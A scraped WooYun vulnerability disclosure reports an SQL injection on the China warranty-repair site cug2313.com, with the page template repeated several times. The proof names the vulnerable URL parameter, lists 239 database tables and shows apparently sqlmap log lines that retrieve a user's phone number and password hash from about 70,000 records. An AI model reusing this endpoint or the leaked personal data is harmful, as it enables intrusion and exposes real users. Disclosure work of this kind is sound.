中国联保网一枚注射导致7W多用户信息密码泄露

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-085286

漏洞标题：中国联保网一枚注射导致7W多用户信息密码泄露

漏洞作者：雅柏菲卡

提交时间：2014-12-01 11:33

修复时间：2015-01-15 11:34

公开时间：2015-01-15 11:34

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：7

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-12-01：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-01-15：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

..............

详细说明：

...........

漏洞证明：

http://www.cug2313.com/repairshop_index.html?kw=1
available databases [2]:
[*] information_schema
[*] lb
Database: lb
[239 tables]
+--------------------------------------+
| `z_bs_paylist_2014-9-11`             |
| `z_complain_2014-9-29_2`             |
| `z_order_area_2014-8-8`              |
| `z_order_auto_retrieve_2014-8-1`     |
| `z_order_auto_retrieve_log_2014-8-1` |
| `z_order_dynamic_2014-10-23`         |
| `z_order_fee_2014-9-11`              |
| `z_order_fee_list_2014-11-14`        |
| `z_order_sms_2014-8-14`              |
| `z_role_2014-11-19`                  |
| `z_user_2014-11-21`                  |
| b_service_area_user_brand            |
| daochu                               |
| list                                 |
| list___                              |
| pay                                  |
| stepex                               |
| typeexc                              |
| user_cate                            |
| userlist                             |
| z_access                             |
| z_ad                                 |
| z_adminmoney                         |
| z_aptitude_img                       |
| z_area                               |
| z_article                            |
| z_assure                             |
| z_audio                              |
| z_b_service_area                     |
| z_bankinfo                           |
| z_belong_group                       |
| z_belong_log                         |
| z_brand                              |
| z_bs_paylist                         |
| z_bs_paylist_copy                    |
| z_caiwu                              |
| z_cate                               |
| z_comment                            |
| z_complain                           |
| z_config                             |
| z_content_img                        |
| z_count                              |
| z_emailrecord                        |
| z_error_log                          |
| z_examine_answer                     |
| z_examine_quest                      |
| z_examine_score                      |
| z_examines                           |
| z_exhibit                            |
| z_exhibit_bak                        |
| z_exhibit_cate                       |
| z_exhibit_data                       |
| z_feedback                           |
| z_follow                             |
| z_followmark                         |
| z_free                               |
| z_goods                              |
| z_group                              |
| z_hepl                               |
| z_img                                |
| z_jiade                              |
| z_jifen                              |
| z_jixiao                             |
| z_job                                |
| z_job_apply                          |
| z_job_data                           |
| z_job_jobcate                        |
| z_job_talent                         |
| z_jobs                               |
| z_kind_contents                      |
| z_kinds                              |
| z_know                               |
| z_know_answer                        |
| z_link                               |
| z_llll                               |
| z_log                                |
| z_logs                               |
| z_member                             |
| z_menu                               |
| z_model                              |
| z_money_log                          |
| z_msg                                |
| z_mynote                             |
| z_new                                |
| z_node                               |
| z_notice                             |
| z_noticestatus                       |
| z_operation_log                      |
| z_order_abutment                     |
| z_order_accessories                  |
| z_order_admin_log                    |
| z_order_area                         |
| z_order_attribute_package            |
| z_order_attribute_repair             |
| z_order_attribute_set                |
| z_order_attribute_srepair            |
| z_order_auto_accpect_pay             |
| z_order_auto_pay                     |
| z_order_auto_retrieve                |
| z_order_auto_retrieve_log            |
| z_order_auto_send_sms                |
| z_order_batch_upload_dtl             |
| z_order_batch_upload_hd              |
| z_order_cart                         |
| z_order_chongzhi                     |
| z_order_city_level                   |
| z_order_close_log                    |
| z_order_common                       |
| z_order_config                       |
| z_order_config_auto_pay              |
| z_order_config_group                 |
| z_order_config_upload                |
| z_order_contract                     |
| z_order_contract_20141101            |
| z_order_cprice                       |
| z_order_dynamic                      |
| z_order_end                          |
| z_order_fee                          |
| z_order_fee_change_log               |
| z_order_fee_list                     |
| z_order_fee_log                      |
| z_order_free_days                    |
| z_order_fuwupinglun                  |
| z_order_install_guidance             |
| z_order_kefu                         |
| z_order_kefu_yanchi                  |
| z_order_kefu_yanzhen                 |
| z_order_list                         |
| z_order_liuyan                       |
| z_order_logs                         |
| z_order_mayor                        |
| z_order_menu                         |
| z_order_msg                          |
| z_order_number_log                   |
| z_order_pack                         |
| z_order_paidan                       |
| z_order_pay                          |
| z_order_pay_copy                     |
| z_order_paylist                      |
| z_order_paylistcopy                  |
| z_order_payment                      |
| z_order_picpath                      |
| z_order_pingjia                      |
| z_order_power                        |
| z_order_process                      |
| z_order_product                      |
| z_order_product_dingdan              |
| z_order_regularly_reminded           |
| z_order_repair_content               |
| z_order_repair_guidance              |
| z_order_repairinfo                   |
| z_order_repairservice                |
| z_order_role                         |
| z_order_role_copy_20141104           |
| z_order_sms                          |
| z_order_sms_reply                    |
| z_order_sms_sanual_log               |
| z_order_sms_tpl                      |
| z_order_steplogs                     |
| z_order_unitlist                     |
| z_order_user_brand                   |
| z_order_user_config                  |
| z_order_user_description             |
| z_order_user_googs                   |
| z_order_user_googs_alias             |
| z_order_user_pay                     |
| z_order_user_role_relation           |
| z_order_usergroup                    |
| z_order_userinfo                     |
| z_order_userinfo_copy                |
| z_order_userinfo_copy1               |
| z_order_water_code                   |
| z_order_weixin                       |
| z_order_yewugendan                   |
| z_orderlog                           |
| z_paidan_logs                        |
| z_pandan                             |
| z_pandan_action                      |
| z_pandan_content                     |
| z_pandan_contract                    |
| z_pandan_order                       |
| z_pandan_protect                     |
| z_pandan_reason                      |
| z_pandan_relation                    |
| z_pay_repair_business                |
| z_pay_repair_business_log            |
| z_pconfig                            |
| z_pmodel                             |
| z_product                            |
| z_promote                            |
| z_pvalue                             |
| z_question_category                  |
| z_relation                           |
| z_repair_paylist                     |
| z_resume                             |
| z_resume_data                        |
| z_rizhi_add                          |
| z_rizhi_contract                     |
| z_rizhi_node                         |
| z_role                               |
| z_role_user                          |
| z_scaler                             |
| z_scode                              |
| z_scode_factor_saler_rel             |
| z_scode_log                          |
| z_scode_market                       |
| z_scode_pro_sale_list                |
| z_scode_sales                        |
| z_scode_scan                         |
| z_scode_set                          |
| z_scode_user                         |
| z_sigle                              |
| z_singlepage                         |
| z_tag                                |
| z_tagged                             |
| z_tech_cate                          |
| z_tousu                              |
| z_user                               |
| z_user_1                             |
| z_user_copy                          |
| z_user_fee                           |
| z_user_info                          |
| z_user_r                             |
| z_value                              |
| z_valuerelation                      |
| z_veriycode                          |
| z_weixin_log                         |
| z_wicket                             |
| z_work_logs                          |
| z_workacmsg                          |
| z_worklog                            |
| z_worklogs                           |
| z_workmsg                            |
| z_workorder                          |
| z_xiadan_tongji                      |
| z_yanzhen                            |
| z_yanzheng                           |
| z_yanzheng_log                       |
| z_yongda                             |
+--------------------------------------+
[20:47:43] [INFO] the SQL query used returns 70554 entries
[20:47:45] [INFO] retrieved:
[20:47:47] [INFO] retrieved: 13254542225
[20:47:48] [INFO] retrieved: 0.00
[20:47:49] [INFO] retrieved:
[20:47:50] [INFO] retrieved: 0
[20:47:51] [INFO] retrieved:
[20:47:51] [INFO] retrieved: 1
[20:47:52] [INFO] retrieved: 11
[20:47:53] [INFO] retrieved: 1356094382
[20:47:55] [INFO] retrieved:
[20:47:56] [INFO] retrieved: 0.00
[20:47:58] [INFO] retrieved: 14e1b600b1fd579f47433b88e8d85291

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-085286

漏洞标题：中国联保网一枚注射导致7W多用户信息密码泄露

相关厂商：中国联保网

漏洞作者：雅柏菲卡

提交时间：2014-12-01 11:33

修复时间：2015-01-15 11:34

公开时间：2015-01-15 11:34

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：7

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源雅柏菲卡@乌云

漏洞回应

厂商回应：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-085286

漏洞标题：中国联保网一枚注射导致7W多用户信息密码泄露

相关厂商：中国联保网

漏洞作者： 雅柏菲卡

提交时间：2014-12-01 11:33

修复时间：2015-01-15 11:34

公开时间：2015-01-15 11:34

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：7

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-085286"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 雅柏菲卡@乌云

漏洞回应

厂商回应：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：雅柏菲卡

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源雅柏菲卡@乌云